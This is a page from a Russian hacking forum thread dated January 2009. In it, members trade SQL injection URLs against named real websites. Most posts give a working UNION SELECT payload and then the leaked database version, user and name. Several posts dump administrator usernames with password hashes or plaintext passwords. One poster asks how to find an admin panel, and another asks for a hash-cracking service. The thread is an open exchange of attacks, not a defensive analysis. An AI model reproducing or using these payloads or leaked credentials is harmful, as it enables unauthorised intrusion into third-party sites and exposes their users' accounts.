ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7481  
Старый 13.01.2009, 23:40
Аватар для _evgeniy_
_evgeniy_
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982

Репутация: 26
По умолчанию

Код:
http://mirsnov.ru/dream.php?id=-196+union+select+concat_ws(0x3a,name,pass),user(),version(),4,database(),6+FROM+authors+limit+5,1--
user: u90152@10.10.227.201
version: 5.0.67-log
database: u90152_mirsnov

http://mirsnov.ru/admin/

name: ornata
pass: 492446ef7a314e3983a73efd5e9ea4a1 197174 (также к емейлу подходит orlovanatalie@nm.ru)
 
Ответить с цитированием

  #7482  
Старый 14.01.2009, 00:51
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

http://www.uab.edu/lister/faq/index.php?askReferenceID=1&ID=-104+union+select+1,version(),3,4,5,6,7--
4.0.18-log

http://www.omnigraphics.com/category_view.php?ID=-3+union+select+1,version(),3,4,5--
4.1.22

http://www.medicalprogresstoday.com/spotlight/spotlight_indarchive.php?id=1147+union+select+1,ve rsion(),3,4,5,6,7--

http://www.omnigraphics.com/product_view.php?ID=-244++union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18--

+
http://www.rfidupdate.com/articles/index.php?id=-1447+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15--

Последний раз редактировалось hackmen; 14.01.2009 в 01:16..
 
Ответить с цитированием

  #7483  
Старый 14.01.2009, 03:13
Аватар для svesve
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

http://stopstyle.ru/index.php?act=sb&r=1&m=4&sm=-1+union+select 1,2,version()--
4.1.22-log

Последний раз редактировалось jokester; 14.01.2009 в 11:29.. Причина: Вопросы в соседней теме
 
Ответить с цитированием

  #7484  
Старый 14.01.2009, 06:37
Аватар для vakula
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Код:
http://www.scorpx.com/?item_id=-99999999%20UNION%20SELECT%201,concat_ws(%200x3a3a,version(),user(),database()),3,4,5%20%20--
version::5.0.67-community
user:: izhevskp_scorpx@localhost
database::izhevskp_scorpx
 
Ответить с цитированием

  #7485  
Старый 14.01.2009, 06:52
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

"Каталог программиста"

Код:
http://articles.org.ru/cn/?c=-16+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,0,11--
 
Ответить с цитированием

  #7486  
Старый 14.01.2009, 09:19
Аватар для vakula
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Донецкий профессиональный футбольный клуб «Титан»

Код:
http://www.titan.dn.ua/base.php?chapter=textChapter&appellation=players&id=-2%20UNION%20SELECT%201,concat_ws(%200x3a3a,version(),user(),database()),3,4
version::5.0.27
user::titandnua@localhost
database::titandnua

Код:
http://uastar.com.ua/?target=site_details&id=-429%20UNION%20SELECT%201,2,3,version(),user(),6,database(),8,9,10,11,12,13,14,15,16,17,18%20%20--
version::5.0.41-log
user::uastar-kiev-ua@localhost
database::u14215

Код:
http://uastar.com.ua/?target=site_details&id=-429%20UNION%20SELECT%201,2,3,password,5,6,login,8,9,10,11,12,13,14,15,16,17,18%20FROM%20admins%20limit%200,1%20--
aдин:: Sany
пасс:: h4$8j.

админку не нашол, потому как не умею её искать )) кто найдёт и пояснит как, буду очень признателен.

Последний раз редактировалось vakula; 14.01.2009 в 09:52..
 
Ответить с цитированием

  #7487  
Старый 14.01.2009, 10:30
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://dromnyc.com/home/index.php/?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
PR = 5

muhtarim:7d784f7f6be34258ba9070dc7188dd87:dG0D2d7I jKj1oJrL
 
Ответить с цитированием

  #7488  
Старый 14.01.2009, 11:06
Аватар для vakula
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Наталья Солнцева- королева мистического детектива
Код:
http://www.solntseva.com/news_detail.php?id=-95%20UNION%20SELECT%201,2,concat_ws(%200x3a3a,version(),user(),database()),4
version::5.0.67-community
user::solntsev_dbu@localhost
database::solntsev_db

Код:
http://www.solntseva.com/news_detail.php?id=-95%20UNION%20SELECT%201,username,user_password,4%20FROM%20phpdd_users%20limit%201,1%20--
админ::Татьяна_Н
пасс::5378190815408f70d85e421bc5eea6bd
кто нибудь, дайте сайт или прогу которые могут подбирать реально хеш!!! Буду очень благодарен.
 
Ответить с цитированием

  #7489  
Старый 14.01.2009, 11:59
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Код:
http://otzuv.ru/view.htm?m_id=-1/**/union/**/select/**/1,version(),user(),4,5,database(),7,8,9,10,11,12,13,14,15,16--
Есть базы от phpbb, vbulletin, на сайте стоит ipb. Короче, полный ахтунг.
Код:
http://otzuv.ru/view.htm?m_id=-1/**/union/**/select/**/1,username,user_password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/phpbb_users/**/limit/**/1,1--
 
Ответить с цитированием

  #7490  
Старый 14.01.2009, 21:33
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

http://www.tapsns.com/news.php?newsid=12+union+select+concat_ws(0x3a3a,v ersion(),user(),database()),2,3+--

5.0.67-community-nt::dream@localhost::dreamaccount
===================

http://www.ifsociety.com/viola/news.php?newsid=9999+union+select+1,2,3,4,5,concat _ws(0x3a3a,version(),user(),database())+--

5.0.45::ifsociety@10.1.0.13::ifsociety
===================

http://www.simbin.se/news.php?newsid=-120+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4,5+--

5.0.41-COMMUNITY-NT-LOG::SIMBINS_SIMBINSE@LOCALHOST::SIMBINS_SIMBINSE
===================

http://www.giacusa.com/news.php?newsid=-83+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6+--

5.0.67-COMMUNITY::GIACUSA2_1@LOCALHOST::GIACUSA2_
===================

http://www.polarware.com/news.php?newsid=1+union+select+1,concat_ws(0x3a3a, version(),user(),database()),3,4+--


4.1.22-standard:olar_website@localhost:olar_website
===================

http://www.somo.org/news.php?newsID=-406+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a3a,version(),user(),database()),12+--

5.0.51a-community-log::somoorg_sql@ns1.pennblog.com::somoorg_SOMO
===================

http://www.kingscollege.es/news.php?idnew=-31+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,version(),user(),database()),12,13,14--

5.0.24-max-log::root@localhost::kingscollege_v2
===================

http://www.kcmurcia.es/news.php?idnew=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,version(),user(),database()),12,13,14+--

5.0.24-max-log::root@localhost::kcmurcia
===================

http://www.strumelab.com/news.php?idnew=5+union+select+1,2,3,concat_ws(0x3a 3a,version(),user(),database()),5,6,7,8,9,10,11,12 ,13+--

5.0.68-log::Sql163784@62.149.141.74::Sql163784_1
===================

http://www.premiumwanadoo.com/mfbeta/Public/News.php?IDnew=-28+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5+--

5.0.45-community-log::75f0df9a0a565091@10.103.0.12::4C8BA43K1
===================

http://www.likom-invest.ru/news.php?idnews=-773+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5+--

5.0.67-log::u27657@10.10.153.184::u27657
===================

http://www.balivillagency.com/news.php?idnews=-10+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5+--

5.0.67-community-log::balivill_dwi@localhost::balivill_balivillagen cy
===================

На сегодня вроде все =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ